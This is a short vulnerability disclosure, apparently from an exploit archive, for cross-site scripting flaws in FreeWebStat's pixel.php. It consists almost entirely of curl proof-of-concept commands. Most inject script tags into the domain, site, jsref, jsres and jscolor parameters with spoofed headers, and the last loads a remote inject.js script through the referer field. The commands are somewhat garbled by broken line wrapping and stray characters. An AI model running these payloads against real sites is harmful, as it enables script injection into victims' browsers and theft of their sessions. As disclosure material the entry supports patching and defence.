FreeWebStat Multiple Cross-Site Scripting Vulnerabilities

FreeWebStat Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

curl "http://www.example.com/fws/pixel.php"
domain=<script>alert(1)</script>
&site=<script>alert(2)</script>
&jsref=<script>alert(3)</script>
&jsres=<script>alert(4)</script>
&jscolor=<script>alert(5)</script>?
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www.example.com"

curl "http://www.example.com/fws/pixel.php"
domain=ush.it&site=aa&jsref=http://www.example.com&jsres=1337&jscolor=red?
-e "http://www.example.com/search?q=lello+splendor++&hl=it&lr=&start=
10&sa=N?
-A "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1; SV1; (R1 1.3))"

curl "http://www.example.com/fws/pixel.php"
domain=www.example.com&site=aa&jsref=http://www.example.com&jsres=13
37&jscolor=red? -e "http://www.example.com"
-A "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

curl "http://www.example.com/fws/pixel.php"
domain=<script>alert(1)</script>&site=
<script>alert(2)&jsref=</script><script>alert(3)</script>
&jsres=<script>alert(4)</script>&jscolor=
<script>alert(5)</script>?
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www.example.com"

curl http://www.example.com/fws/pixel.php?site=
&jsres=&jscolor=&jsref=http://www.example.com/search?
q=ppoopp<script language=?javascript?-src=
"http://www.example.com/fws/inject.js?></script>&hl=it"